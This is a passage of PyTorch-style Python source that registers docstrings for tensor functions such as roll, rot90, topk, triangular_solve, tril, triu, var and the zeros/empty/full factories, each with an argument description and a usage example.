Note:
Requires the tensor to be at least 2-D.
.. note::
`torch.fliplr` makes a copy of :attr:`input`'s data. This is different from NumPy's `np.fliplr`,
which returns a view in constant time. Since copying a tensor's data is more work than viewing that data,
`torch.fliplr` is expected to be slower than `np.fliplr`.
Args:
input (Tensor): Must be at least 2-dimensional.
Example::
>>> x = torch.arange(4).view(2, 2)
>>> x
tensor([[0, 1],
[2, 3]])
>>> torch.fliplr(x)
tensor([[1, 0],
[3, 2]])
""".format(**common_args))
add_docstr(torch.flipud,
r"""
flipud(input) -> Tensor
Flip tensor in the up/down direction, returning a new tensor.
Flip the entries in each column in the up/down direction.
Rows are preserved, but appear in a different order than before.
Note:
Requires the tensor to be at least 1-D.
.. note::
`torch.flipud` makes a copy of :attr:`input`'s data. This is different from NumPy's `np.flipud`,
which returns a view in constant time. Since copying a tensor's data is more work than viewing that data,
`torch.flipud` is expected to be slower than `np.flipud`.
Args:
input (Tensor): Must be at least 1-dimensional.
Example::
>>> x = torch.arange(4).view(2, 2)
>>> x
tensor([[0, 1],
[2, 3]])
>>> torch.flipud(x)
tensor([[2, 3],
[0, 1]])
""".format(**common_args))
add_docstr(torch.roll,
r"""
roll(input, shifts, dims=None) -> Tensor
Roll the tensor along the given dimension(s). Elements that are shifted beyond the
last position are re-introduced at the first position. If a dimension is not
specified, the tensor will be flattened before rolling and then restored
to the original shape.
Args:
{input}
shifts (int or tuple of ints): The number of places by which the elements
of the tensor are shifted. If shifts is a tuple, dims must be a tuple of
the same size, and each dimension will be rolled by the corresponding
value
dims (int or tuple of ints): Axis along which to roll
Example::
>>> x = torch.tensor([1, 2, 3, 4, 5, 6, 7, 8]).view(4, 2)
>>> x
tensor([[1, 2],
[3, 4],
[5, 6],
[7, 8]])
>>> torch.roll(x, 1, 0)
tensor([[7, 8],
[1, 2],
[3, 4],
[5, 6]])
>>> torch.roll(x, -1, 0)
tensor([[3, 4],
[5, 6],
[7, 8],
[1, 2]])
>>> torch.roll(x, shifts=(2, 1), dims=(0, 1))
tensor([[6, 5],
[8, 7],
[2, 1],
[4, 3]])
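>>> # without dims the tensor is flattened, rolled, and reshaped back
>>> torch.roll(x, 1)
tensor([[8, 1],
        [2, 3],
        [4, 5],
        [6, 7]])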
""".format(**common_args))
add_docstr(torch.rot90,
r"""
rot90(input, k, dims) -> Tensor
Rotates an n-D tensor by 90 degrees in the plane specified by the dims axes.
Rotation direction is from the first towards the second axis if k > 0, and from the second towards the first for k < 0.
Args:
{input}
k (int): number of times to rotate
dims (a list or tuple): axis to rotate
Example::
>>> x = torch.arange(4).view(2, 2)
>>> x
tensor([[0, 1],
[2, 3]])
>>> torch.rot90(x, 1, [0, 1])
tensor([[1, 3],
[0, 2]])
>>> x = torch.arange(8).view(2, 2, 2)
>>> x
tensor([[[0, 1],
[2, 3]],
[[4, 5],
[6, 7]]])
>>> torch.rot90(x, 1, [1, 2])
tensor([[[1, 3],
[0, 2]],
[[5, 7],
[4, 6]]])
""".format(**common_args))
add_docstr(torch.take,
r"""
take(input, index) -> Tensor
Returns a new tensor with the elements of :attr:`input` at the given indices.
The input tensor is treated as if it were viewed as a 1-D tensor. The result
takes the same shape as the indices.
Args:
{input}
index (LongTensor): the indices into tensor
Example::
>>> src = torch.tensor([[4, 3, 5],
... [6, 7, 8]])
>>> torch.take(src, torch.tensor([0, 2, 5]))
tensor([ 4, 5, 8])
""".format(**common_args))
add_docstr(torch.take_along_dim,
r"""
take_along_dim(input, indices, dim, *, out=None) -> Tensor
Selects values from :attr:`input` at the 1-dimensional indices from :attr:`indices` along the given :attr:`dim`.
Functions that return indices along a dimension, like :func:`torch.argmax` and :func:`torch.argsort`,
are designed to work with this function. See the examples below.
.. note::
This function is similar to NumPy's `take_along_axis`.
See also :func:`torch.gather`.
Args:
{input}
indices (tensor): the indices into :attr:`input`. Must have long dtype.
dim (int): dimension to select along.
Keyword args:
{out}
Example::
>>> t = torch.tensor([[10, 30, 20], [60, 40, 50]])
>>> max_idx = torch.argmax(t)
>>> torch.take_along_dim(t, max_idx)
tensor([60])
>>> sorted_idx = torch.argsort(t, dim=1)
>>> torch.take_along_dim(t, sorted_idx, dim=1)
tensor([[10, 20, 30],
[40, 50, 60]])
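>>> # combined with keepdim=True, argmax along a dimension selects the per-row maxima
>>> torch.take_along_dim(t, torch.argmax(t, dim=1, keepdim=True), dim=1)
tensor([[30],
        [60]])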
""".format(**common_args))
add_docstr(torch.tan,
r"""
tan(input, *, out=None) -> Tensor
Returns a new tensor with the tangent of the elements of :attr:`input`.
.. math::
\text{out}_{i} = \tan(\text{input}_{i})
""" + r"""
Args:
{input}
Keyword args:
{out}
Example::
>>> a = torch.randn(4)
>>> a
tensor([-1.2027, -1.7687, 0.4412, -1.3856])
>>> torch.tan(a)
tensor([-2.5930, 4.9859, 0.4722, -5.3366])
""".format(**common_args))
add_docstr(torch.tanh,
r"""
tanh(input, *, out=None) -> Tensor
Returns a new tensor with the hyperbolic tangent of the elements
of :attr:`input`.
.. math::
\text{out}_{i} = \tanh(\text{input}_{i})
""" + r"""
Args:
{input}
Keyword args:
{out}
Example::
>>> a = torch.randn(4)
>>> a
tensor([ 0.8986, -0.7279, 1.1745, 0.2611])
>>> torch.tanh(a)
tensor([ 0.7156, -0.6218, 0.8257, 0.2553])
""".format(**common_args))
add_docstr(torch.topk,
r"""
topk(input, k, dim=None, largest=True, sorted=True, *, out=None) -> (Tensor, LongTensor)
Returns the :attr:`k` largest elements of the given :attr:`input` tensor along
a given dimension.
If :attr:`dim` is not given, the last dimension of the `input` is chosen.
If :attr:`largest` is ``False`` then the `k` smallest elements are returned.
A namedtuple of `(values, indices)` is returned with the `values` and
`indices` of the largest `k` elements of each row of the `input` tensor in the
given dimension `dim`.
The boolean option :attr:`sorted`, if ``True``, ensures that the returned
`k` elements are themselves sorted.
Args:
{input}
k (int): the k in "top-k"
dim (int, optional): the dimension to sort along
largest (bool, optional): controls whether to return largest or
smallest elements
sorted (bool, optional): controls whether to return the elements
in sorted order
Keyword args:
out (tuple, optional): the output tuple of (Tensor, LongTensor) that can be
optionally given to be used as output buffers
Example::
>>> x = torch.arange(1., 6.)
>>> x
tensor([ 1., 2., 3., 4., 5.])
>>> torch.topk(x, 3)
torch.return_types.topk(values=tensor([5., 4., 3.]), indices=tensor([4, 3, 2]))
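>>> # with largest=False the k smallest elements are returned instead
>>> torch.topk(x, 3, largest=False)
torch.return_types.topk(values=tensor([1., 2., 3.]), indices=tensor([0, 1, 2]))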
""".format(**common_args))
add_docstr(torch.trace,
r"""
trace(input) -> Tensor
Returns the sum of the elements of the diagonal of the input 2-D matrix.
Example::
>>> x = torch.arange(1., 10.).view(3, 3)
>>> x
tensor([[ 1., 2., 3.],
[ 4., 5., 6.],
[ 7., 8., 9.]])
>>> torch.trace(x)
tensor(15.)
""")
add_docstr(torch.transpose,
r"""
transpose(input, dim0, dim1) -> Tensor
Returns a tensor that is a transposed version of :attr:`input`.
The given dimensions :attr:`dim0` and :attr:`dim1` are swapped.
If :attr:`input` is a strided tensor then the resulting :attr:`out`
tensor shares its underlying storage with the :attr:`input` tensor, so
changing the content of one would change the content of the other.
If :attr:`input` is a :ref:`sparse tensor <sparse-docs>` then the
resulting :attr:`out` tensor *does not* share the underlying storage
with the :attr:`input` tensor.
Args:
{input}
dim0 (int): the first dimension to be transposed
dim1 (int): the second dimension to be transposed
Example::
>>> x = torch.randn(2, 3)
>>> x
tensor([[ 1.0028, -0.9893, 0.5809],
[-0.1669, 0.7299, 0.4942]])
>>> torch.transpose(x, 0, 1)
tensor([[ 1.0028, -0.1669],
[-0.9893, 0.7299],
[ 0.5809, 0.4942]])
See also :func:`torch.t`.
""".format(**common_args))
add_docstr(torch.triangular_solve,
r"""
triangular_solve(b, A, upper=True, transpose=False, unitriangular=False, *, out=None) -> (Tensor, Tensor)
Solves a system of equations with a square upper or lower triangular invertible matrix :math:`A`
and multiple right-hand sides :math:`b`.
In symbols, it solves :math:`AX = b` and assumes :math:`A` is square upper-triangular
(or lower-triangular if :attr:`upper`\ `= False`) and does not have zeros on the diagonal.
`torch.triangular_solve(b, A)` can take in 2D inputs `b, A` or inputs that are
batches of 2D matrices. If the inputs are batches, then the function returns
batched outputs `X`.
If the diagonal of :attr:`A` contains zeros or elements that are very close to zero and
:attr:`unitriangular`\ `= False` (default) or if the input matrix is badly conditioned,
the result may contain `NaN` s.
Supports input of float, double, cfloat and cdouble data types.
.. warning::
:func:`torch.triangular_solve` is deprecated in favor of :func:`torch.linalg.solve_triangular`
and will be removed in a future PyTorch release.
:func:`torch.linalg.solve_triangular` has its arguments reversed and does not return a
copy of one of the inputs.
``X = torch.triangular_solve(B, A).solution`` should be replaced with
.. code:: python
X = torch.linalg.solve_triangular(A, B)
Args:
b (Tensor): multiple right-hand sides of size :math:`(*, m, k)` where
:math:`*` is zero or more batch dimensions
A (Tensor): the input triangular coefficient matrix of size :math:`(*, m, m)`
where :math:`*` is zero or more batch dimensions
upper (bool, optional): whether :math:`A` is upper or lower triangular. Default: ``True``.
transpose (bool, optional): solves `op(A)X = b` where `op(A) = A^T` if this flag is ``True``,
and `op(A) = A` if it is ``False``. Default: ``False``.
unitriangular (bool, optional): whether :math:`A` is unit triangular.
If True, the diagonal elements of :math:`A` are assumed to be
1 and not referenced from :math:`A`. Default: ``False``.
Keyword args:
out ((Tensor, Tensor), optional): tuple of two tensors to write
the output to. Ignored if `None`. Default: `None`.
Returns:
A namedtuple `(solution, cloned_coefficient)` where `cloned_coefficient`
is a clone of :math:`A` and `solution` is the solution :math:`X` to :math:`AX = b`
(or whatever variant of the system of equations, depending on the keyword arguments.)
Examples::
>>> A = torch.randn(2, 2).triu()
>>> A
tensor([[ 1.1527, -1.0753],
[ 0.0000, 0.7986]])
>>> b = torch.randn(2, 3)
>>> b
tensor([[-0.0210, 2.3513, -1.5492],
[ 1.5429, 0.7403, -1.0243]])
>>> torch.triangular_solve(b, A)
torch.return_types.triangular_solve(
solution=tensor([[ 1.7841, 2.9046, -2.5405],
[ 1.9320, 0.9270, -1.2826]]),
cloned_coefficient=tensor([[ 1.1527, -1.0753],
[ 0.0000, 0.7986]]))
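>>> # sanity check: the returned solution satisfies A @ X = b (up to floating-point error)
>>> X = torch.triangular_solve(b, A).solution
>>> torch.allclose(A @ X, b, atol=1e-5)
True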
""")
add_docstr(torch.tril,
r"""
tril(input, diagonal=0, *, out=None) -> Tensor
Returns the lower triangular part of the matrix (2-D tensor) or batch of matrices
:attr:`input`, the other elements of the result tensor :attr:`out` are set to 0.
The lower triangular part of the matrix is defined as the elements on and
below the diagonal.
The argument :attr:`diagonal` controls which diagonal to consider. If
:attr:`diagonal` = 0, all elements on and below the main diagonal are
retained. A positive value includes just as many diagonals above the main
diagonal, and similarly a negative value excludes just as many diagonals below
the main diagonal. The main diagonal is the set of indices
:math:`\lbrace (i, i) \rbrace` for :math:`i \in [0, \min\{d_{1}, d_{2}\} - 1]` where
:math:`d_{1}, d_{2}` are the dimensions of the matrix.
""" + r"""
Args:
{input}
diagonal (int, optional): the diagonal to consider
Keyword args:
{out}
Example::
>>> a = torch.randn(3, 3)
>>> a
tensor([[-1.0813, -0.8619, 0.7105],
[ 0.0935, 0.1380, 2.2112],
[-0.3409, -0.9828, 0.0289]])
>>> torch.tril(a)
tensor([[-1.0813, 0.0000, 0.0000],
[ 0.0935, 0.1380, 0.0000],
[-0.3409, -0.9828, 0.0289]])
>>> b = torch.randn(4, 6)
>>> b
tensor([[ 1.2219, 0.5653, -0.2521, -0.2345, 1.2544, 0.3461],
[ 0.4785, -0.4477, 0.6049, 0.6368, 0.8775, 0.7145],
[ 1.1502, 3.2716, -1.1243, -0.5413, 0.3615, 0.6864],
[-0.0614, -0.7344, -1.3164, -0.7648, -1.4024, 0.0978]])
>>> torch.tril(b, diagonal=1)
tensor([[ 1.2219, 0.5653, 0.0000, 0.0000, 0.0000, 0.0000],
[ 0.4785, -0.4477, 0.6049, 0.0000, 0.0000, 0.0000],
[ 1.1502, 3.2716, -1.1243, -0.5413, 0.0000, 0.0000],
[-0.0614, -0.7344, -1.3164, -0.7648, -1.4024, 0.0000]])
>>> torch.tril(b, diagonal=-1)
tensor([[ 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000],
[ 0.4785, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000],
[ 1.1502, 3.2716, 0.0000, 0.0000, 0.0000, 0.0000],
[-0.0614, -0.7344, -1.3164, 0.0000, 0.0000, 0.0000]])
""".format(**common_args))
# docstr is split in two parts to avoid format mis-capturing :math: braces '{}'
# as common args.
add_docstr(torch.tril_indices,
r"""
tril_indices(row, col, offset=0, *, dtype=torch.long, device='cpu', layout=torch.strided) -> Tensor
Returns the indices of the lower triangular part of a :attr:`row`-by-
:attr:`col` matrix in a 2-by-N Tensor, where the first row contains row
coordinates of all indices and the second row contains column coordinates.
Indices are ordered based on rows and then columns.
The lower triangular part of the matrix is defined as the elements on and
below the diagonal.
The argument :attr:`offset` controls which diagonal to consider. If
:attr:`offset` = 0, all elements on and below the main diagonal are
retained. A positive value includes just as many diagonals above the main
diagonal, and similarly a negative value excludes just as many diagonals below
the main diagonal. The main diagonal is the set of indices
:math:`\lbrace (i, i) \rbrace` for :math:`i \in [0, \min\{d_{1}, d_{2}\} - 1]`
where :math:`d_{1}, d_{2}` are the dimensions of the matrix.
.. note::
When running on CUDA, ``row * col`` must be less than :math:`2^{59}` to
prevent overflow during calculation.
""" + r"""
Args:
row (``int``): number of rows in the 2-D matrix.
col (``int``): number of columns in the 2-D matrix.
offset (``int``): diagonal offset from the main diagonal.
Default: if not provided, 0.
Keyword args:
dtype (:class:`torch.dtype`, optional): the desired data type of returned tensor.
Default: if ``None``, ``torch.long``.
{device}
layout (:class:`torch.layout`, optional): currently only support ``torch.strided``.
Example::
>>> a = torch.tril_indices(3, 3)
>>> a
tensor([[0, 1, 1, 2, 2, 2],
[0, 0, 1, 0, 1, 2]])
>>> a = torch.tril_indices(4, 3, -1)
>>> a
tensor([[1, 2, 2, 3, 3, 3],
[0, 0, 1, 0, 1, 2]])
>>> a = torch.tril_indices(4, 3, 1)
>>> a
tensor([[0, 0, 1, 1, 1, 2, 2, 2, 3, 3, 3],
[0, 1, 0, 1, 2, 0, 1, 2, 0, 1, 2]])
""".format(**factory_common_args))
add_docstr(torch.triu,
r"""
triu(input, diagonal=0, *, out=None) -> Tensor
Returns the upper triangular part of a matrix (2-D tensor) or batch of matrices
:attr:`input`, the other elements of the result tensor :attr:`out` are set to 0.
The upper triangular part of the matrix is defined as the elements on and
above the diagonal.
The argument :attr:`diagonal` controls which diagonal to consider. If
:attr:`diagonal` = 0, all elements on and above the main diagonal are
retained. A positive value excludes just as many diagonals above the main
diagonal, and similarly a negative value includes just as many diagonals below
the main diagonal. The main diagonal is the set of indices
:math:`\lbrace (i, i) \rbrace` for :math:`i \in [0, \min\{d_{1}, d_{2}\} - 1]` where
:math:`d_{1}, d_{2}` are the dimensions of the matrix.
""" + r"""
Args:
{input}
diagonal (int, optional): the diagonal to consider
Keyword args:
{out}
Example::
>>> a = torch.randn(3, 3)
>>> a
tensor([[ 0.2309, 0.5207, 2.0049],
[ 0.2072, -1.0680, 0.6602],
[ 0.3480, -0.5211, -0.4573]])
>>> torch.triu(a)
tensor([[ 0.2309, 0.5207, 2.0049],
[ 0.0000, -1.0680, 0.6602],
[ 0.0000, 0.0000, -0.4573]])
>>> torch.triu(a, diagonal=1)
tensor([[ 0.0000, 0.5207, 2.0049],
[ 0.0000, 0.0000, 0.6602],
[ 0.0000, 0.0000, 0.0000]])
>>> torch.triu(a, diagonal=-1)
tensor([[ 0.2309, 0.5207, 2.0049],
[ 0.2072, -1.0680, 0.6602],
[ 0.0000, -0.5211, -0.4573]])
>>> b = torch.randn(4, 6)
>>> b
tensor([[ 0.5876, -0.0794, -1.8373, 0.6654, 0.2604, 1.5235],
[-0.2447, 0.9556, -1.2919, 1.3378, -0.1768, -1.0857],
[ 0.4333, 0.3146, 0.6576, -1.0432, 0.9348, -0.4410],
[-0.9888, 1.0679, -1.3337, -1.6556, 0.4798, 0.2830]])
>>> torch.triu(b, diagonal=1)
tensor([[ 0.0000, -0.0794, -1.8373, 0.6654, 0.2604, 1.5235],
[ 0.0000, 0.0000, -1.2919, 1.3378, -0.1768, -1.0857],
[ 0.0000, 0.0000, 0.0000, -1.0432, 0.9348, -0.4410],
[ 0.0000, 0.0000, 0.0000, 0.0000, 0.4798, 0.2830]])
>>> torch.triu(b, diagonal=-1)
tensor([[ 0.5876, -0.0794, -1.8373, 0.6654, 0.2604, 1.5235],
[-0.2447, 0.9556, -1.2919, 1.3378, -0.1768, -1.0857],
[ 0.0000, 0.3146, 0.6576, -1.0432, 0.9348, -0.4410],
[ 0.0000, 0.0000, -1.3337, -1.6556, 0.4798, 0.2830]])
""".format(**common_args))
# docstr is split in two parts to avoid format mis-capturing :math: braces '{}'
# as common args.
add_docstr(torch.triu_indices,
r"""
triu_indices(row, col, offset=0, *, dtype=torch.long, device='cpu', layout=torch.strided) -> Tensor
Returns the indices of the upper triangular part of a :attr:`row` by
:attr:`col` matrix in a 2-by-N Tensor, where the first row contains row
coordinates of all indices and the second row contains column coordinates.
Indices are ordered based on rows and then columns.
The upper triangular part of the matrix is defined as the elements on and
above the diagonal.
The argument :attr:`offset` controls which diagonal to consider. If
:attr:`offset` = 0, all elements on and above the main diagonal are
retained. A positive value excludes just as many diagonals above the main
diagonal, and similarly a negative value includes just as many diagonals below
the main diagonal. The main diagonal is the set of indices
:math:`\lbrace (i, i) \rbrace` for :math:`i \in [0, \min\{d_{1}, d_{2}\} - 1]`
where :math:`d_{1}, d_{2}` are the dimensions of the matrix.
.. note::
When running on CUDA, ``row * col`` must be less than :math:`2^{59}` to
prevent overflow during calculation.
""" + r"""
Args:
row (``int``): number of rows in the 2-D matrix.
col (``int``): number of columns in the 2-D matrix.
offset (``int``): diagonal offset from the main diagonal.
Default: if not provided, 0.
Keyword args:
dtype (:class:`torch.dtype`, optional): the desired data type of returned tensor.
Default: if ``None``, ``torch.long``.
{device}
layout (:class:`torch.layout`, optional): currently only support ``torch.strided``.
Example::
>>> a = torch.triu_indices(3, 3)
>>> a
tensor([[0, 0, 0, 1, 1, 2],
[0, 1, 2, 1, 2, 2]])
>>> a = torch.triu_indices(4, 3, -1)
>>> a
tensor([[0, 0, 0, 1, 1, 1, 2, 2, 3],
[0, 1, 2, 0, 1, 2, 1, 2, 2]])
>>> a = torch.triu_indices(4, 3, 1)
>>> a
tensor([[0, 0, 1],
[1, 2, 2]])
""".format(**factory_common_args))
add_docstr(torch.true_divide, r"""
true_divide(dividend, divisor, *, out) -> Tensor
Alias for :func:`torch.div` with ``rounding_mode=None``.
""")
add_docstr(torch.trunc,
r"""
trunc(input, *, out=None) -> Tensor
Returns a new tensor with the truncated integer values of
the elements of :attr:`input`.
Args:
{input}
Keyword args:
{out}
Example::
>>> a = torch.randn(4)
>>> a
tensor([ 3.4742, 0.5466, -0.8008, -0.9079])
>>> torch.trunc(a)
tensor([ 3., 0., -0., -0.])
""".format(**common_args))
add_docstr(torch.fake_quantize_per_tensor_affine,
r"""
fake_quantize_per_tensor_affine(input, scale, zero_point, quant_min, quant_max) -> Tensor
Returns a new tensor with the data in :attr:`input` fake quantized using :attr:`scale`,
:attr:`zero_point`, :attr:`quant_min` and :attr:`quant_max`.
.. math::
\text{output} = (
    min(
        \text{quant\_max},
        max(
            \text{quant\_min},
            \text{std::nearby\_int}(\text{input} / \text{scale}) + \text{zero\_point}
        )
    ) - \text{zero\_point}
) \times \text{scale}
Args:
input (Tensor): the input value(s), in ``torch.float32``.
scale (double or Tensor): quantization scale
zero_point (int64 or Tensor): quantization zero_point
quant_min (int64): lower bound of the quantized domain
quant_max (int64): upper bound of the quantized domain
Returns:
Tensor: A newly fake_quantized tensor
Example::
>>> x = torch.randn(4)
>>> x
tensor([ 0.0552, 0.9730, 0.3973, -1.0780])
>>> torch.fake_quantize_per_tensor_affine(x, 0.1, 0, 0, 255)
tensor([0.1000, 1.0000, 0.4000, 0.0000])
>>> torch.fake_quantize_per_tensor_affine(x, torch.tensor(0.1), torch.tensor(0), 0, 255)
tensor([0.1000, 1.0000, 0.4000, 0.0000])
""")
add_docstr(torch.fake_quantize_per_channel_affine,
r"""
fake_quantize_per_channel_affine(input, scale, zero_point, axis, quant_min, quant_max) -> Tensor
Returns a new tensor with the data in :attr:`input` fake quantized per channel using :attr:`scale`,
:attr:`zero_point`, :attr:`quant_min` and :attr:`quant_max`, across the channel specified by :attr:`axis`.
.. math::
\text{output} = (
    min(
        \text{quant\_max},
        max(
            \text{quant\_min},
            \text{std::nearby\_int}(\text{input} / \text{scale}) + \text{zero\_point}
        )
    ) - \text{zero\_point}
) \times \text{scale}
Args:
input (Tensor): the input value(s), in ``torch.float32``.
scale (Tensor): quantization scale, per channel
zero_point (Tensor): quantization zero_point, per channel
axis (int32): channel axis
quant_min (int64): lower bound of the quantized domain
quant_max (int64): upper bound of the quantized domain
Returns:
Tensor: A newly fake_quantized per channel tensor
Example::
>>> x = torch.randn(2, 2, 2)
>>> x
tensor([[[-0.2525, -0.0466],
[ 0.3491, -0.2168]],
[[-0.5906, 1.6258],
[ 0.6444, -0.0542]]])
>>> scales = (torch.randn(2) + 1) * 0.05
>>> scales
tensor([0.0475, 0.0486])
>>> zero_points = torch.zeros(2).to(torch.long)
>>> zero_points
tensor([0, 0])
>>> torch.fake_quantize_per_channel_affine(x, scales, zero_points, 1, 0, 255)
tensor([[[0.0000, 0.0000],
[0.3405, 0.0000]],
[[0.0000, 1.6134],
[0.6323, 0.0000]]])
""")
add_docstr(torch.fix,
r"""
fix(input, *, out=None) -> Tensor
Alias for :func:`torch.trunc`
""")
add_docstr(torch.unsqueeze,
r"""
unsqueeze(input, dim) -> Tensor
Returns a new tensor with a dimension of size one inserted at the
specified position.
The returned tensor shares the same underlying data with this tensor.
A :attr:`dim` value within the range ``[-input.dim() - 1, input.dim() + 1)``
can be used. Negative :attr:`dim` will correspond to :meth:`unsqueeze`
applied at :attr:`dim` = ``dim + input.dim() + 1``.
Args:
{input}
dim (int): the index at which to insert the singleton dimension
Example::
>>> x = torch.tensor([1, 2, 3, 4])
>>> torch.unsqueeze(x, 0)
tensor([[ 1, 2, 3, 4]])
>>> torch.unsqueeze(x, 1)
tensor([[ 1],
[ 2],
[ 3],
[ 4]])
""".format(**common_args))
add_docstr(torch.var, r"""
var(input, dim, unbiased, keepdim=False, *, out=None) -> Tensor
Calculates the variance of each row of the :attr:`input` tensor in the given
dimension :attr:`dim`.
If :attr:`unbiased` is ``True``, Bessel's correction will be used.
Otherwise, the sample variance is calculated, without any correction.
Args:
{input}
{dim}
Keyword args:
unbiased (bool): whether to use Bessel's correction (:math:`\delta N = 1`).
{keepdim}
{out}
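Example::
    >>> # per-row variance over dim 1, with Bessel's correction
    >>> b = torch.tensor([[1., 2.], [3., 4.]])
    >>> torch.var(b, dim=1, unbiased=True)
    tensor([0.5000, 0.5000])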
.. function:: var(input, unbiased) -> Tensor
:noindex:
Calculates the variance of all elements in the :attr:`input` tensor.
If :attr:`unbiased` is ``True``, Bessel's correction will be used.
Otherwise, the sample variance is calculated, without any correction.
Args:
{input}
unbiased (bool): whether to use Bessel's correction (:math:`\delta N = 1`).
Example::
>>> a = torch.tensor([[-0.8166, -1.3802, -0.3560]])
>>> torch.var(a, unbiased=False)
tensor(0.1754)
""".format(**multi_dim_common))
add_docstr(torch.var_mean,
r"""
var_mean(input, dim, unbiased, keepdim=False, *, out=None) -> (Tensor, Tensor)
Calculates the variance and mean of each row of the :attr:`input` tensor in the
given dimension :attr:`dim`.
If :attr:`unbiased` is ``True``, Bessel's correction will be used to calculate
the variance. Otherwise, the sample variance is calculated, without any
correction.
Args:
{input}
{dim}
Keyword args:
unbiased (bool): whether to use Bessel's correction (:math:`\delta N = 1`).
{keepdim}
{out}
Returns:
A tuple (var, mean) containing the variance and mean.
.. function:: var_mean(input, unbiased) -> (Tensor, Tensor)
:noindex:
Calculates the variance and mean of all elements in the :attr:`input`
tensor.
If :attr:`unbiased` is ``True``, Bessel's correction will be used.
Otherwise, the sample variance is calculated, without any correction.
Args:
{input}
unbiased (bool): whether to use Bessel's correction (:math:`\delta N = 1`).
Returns:
A tuple (var, mean) containing the variance and mean.
Example::
>>> a = torch.tensor([[-0.8166, -1.3802, -0.3560]])
>>> torch.var_mean(a, unbiased=False)
(tensor(0.1754), tensor(-0.8509))
""".format(**multi_dim_common))
add_docstr(torch.zeros,
r"""
zeros(*size, *, out=None, dtype=None, layout=torch.strided, device=None, requires_grad=False) -> Tensor
Returns a tensor filled with the scalar value `0`, with the shape defined
by the variable argument :attr:`size`.
Args:
size (int...): a sequence of integers defining the shape of the output tensor.
Can be a variable number of arguments or a collection like a list or tuple.
Keyword args:
{out}
{dtype}
{layout}
{device}
{requires_grad}
Example::
>>> torch.zeros(2, 3)
tensor([[ 0., 0., 0.],
[ 0., 0., 0.]])
>>> torch.zeros(5)
tensor([ 0., 0., 0., 0., 0.])
""".format(**factory_common_args))
add_docstr(torch.zeros_like,
r"""
zeros_like(input, *, dtype=None, layout=None, device=None, requires_grad=False, memory_format=torch.preserve_format) -> Tensor
Returns a tensor filled with the scalar value `0`, with the same size as
:attr:`input`. ``torch.zeros_like(input)`` is equivalent to
``torch.zeros(input.size(), dtype=input.dtype, layout=input.layout, device=input.device)``.
.. warning::
As of 0.4, this function does not support an :attr:`out` keyword. As an alternative,
the old ``torch.zeros_like(input, out=output)`` is equivalent to
``torch.zeros(input.size(), out=output)``.
Args:
{input}
Keyword args:
{dtype}
{layout}
{device}
{requires_grad}
{memory_format}
Example::
>>> input = torch.empty(2, 3)
>>> torch.zeros_like(input)
tensor([[ 0., 0., 0.],
[ 0., 0., 0.]])
""".format(**factory_like_common_args))
add_docstr(torch.empty,
"""
empty(*size, *, out=None, dtype=None, layout=torch.strided, device=None, requires_grad=False, pin_memory=False, \
memory_format=torch.contiguous_format) -> Tensor
Returns a tensor filled with uninitialized data. The shape of the tensor is
defined by the variable argument :attr:`size`.
Args:
size (int...): a sequence of integers defining the shape of the output tensor.
Can be a variable number of arguments or a collection like a list or tuple.
Keyword args:
{out}
{dtype}
{layout}
{device}
{requires_grad}
{pin_memory}
{memory_format}
Example::
>>> torch.empty((2,3), dtype=torch.int64)
tensor([[ 9.4064e+13, 2.8000e+01, 9.3493e+13],
[ 7.5751e+18, 7.1428e+18, 7.5955e+18]])
""".format(**factory_common_args))
add_docstr(torch.empty_like,
r"""
empty_like(input, *, dtype=None, layout=None, device=None, requires_grad=False, memory_format=torch.preserve_format) -> Tensor
Returns an uninitialized tensor with the same size as :attr:`input`.
``torch.empty_like(input)`` is equivalent to
``torch.empty(input.size(), dtype=input.dtype, layout=input.layout, device=input.device)``.
Args:
{input}
Keyword args:
{dtype}
{layout}
{device}
{requires_grad}
{memory_format}
Example::
>>> a = torch.empty((2, 3), dtype=torch.int32, device='cuda')
>>> torch.empty_like(a)
tensor([[0, 0, 0],
[0, 0, 0]], device='cuda:0', dtype=torch.int32)
""".format(**factory_like_common_args))
add_docstr(torch.empty_strided,
r"""
empty_strided(size, stride, *, dtype=None, layout=None, device=None, requires_grad=False, pin_memory=False) -> Tensor
Creates a tensor with the specified :attr:`size` and :attr:`stride` and filled with undefined data.
.. warning::
If the constructed tensor is "overlapped" (with multiple indices referring to the same element
in memory) its behavior is undefined.
Args:
size (tuple of ints): the shape of the output tensor
stride (tuple of ints): the strides of the output tensor
Keyword args:
{dtype}
{layout}
{device}
{requires_grad}
{pin_memory}
Example::
>>> a = torch.empty_strided((2, 3), (1, 2))
>>> a
tensor([[8.9683e-44, 4.4842e-44, 5.1239e+07],
[0.0000e+00, 0.0000e+00, 3.0705e-41]])
>>> a.stride()
(1, 2)
>>> a.size()
torch.Size([2, 3])
""".format(**factory_common_args))
add_docstr(torch.full, r"""
full(size, fill_value, *, out=None, dtype=None, layout=torch.strided, device=None, requires_grad=False) -> Tensor
Creates a tensor of size :attr:`size` filled with :attr:`fill_value`. The
tensor's dtype is inferred from :attr:`fill_value`.
Args:
size (int...): a list, tuple, or :class:`torch.Size` of integers defining the
shape of the output tensor.
fill_value (Scalar): the value to fill the output tensor with.
Keyword args:
{out}
{dtype}
{layout}
{device}
{requires_grad}
Example::
>>> torch.full((2, 3), 3.141592)
tensor([[ 3.1416, 3.1416, 3.1416],
[ 3.1416, 3.1416, 3.1416]])
""".format(**factory_common_args))
add_docstr(torch.full_like,
"""
full_like(input, fill_value, \\*, dtype=None, layout=torch.strided, device=None, requires_grad=False, \
memory_format=torch.preserve_format) -> Tensor
Returns a tensor with the same size as :attr:`input` filled with :attr:`fill_value`.
``torch.full_like(input, fill_value)`` is equivalent to
``torch.full(input.size(), fill_value, dtype=input.dtype, layout=input.layout, device=input.device)``.
Args:
{input}
fill_value: the number to fill the output tensor with.
Keyword args:
{dtype}
{layout}
{device}
{requires_grad}
{memory_format}
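Example::
    >>> # the result inherits the shape and float dtype of ``a``
    >>> a = torch.zeros(2, 3)
    >>> torch.full_like(a, 2.)
    tensor([[2., 2., 2.],
            [2., 2., 2.]])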
""".format(**factory_like_common_args))
add_docstr(torch.det, r"""
det(input) -> Tensor
Alias for :func:`torch.linalg.det`
""")
add_docstr(torch.where,
r"""
where(condition, x, y) -> Tensor
Return a tensor of elements selected from either :attr:`x` or :attr:`y`, depending on :attr:`condition`.
The operation is defined as:
.. math::
\text{out}_i = \begin{cases}
\text{x}_i & \text{if } \text{condition}_i \\
\text{y}_i & \text{otherwise} \\
\end{cases}
.. note::
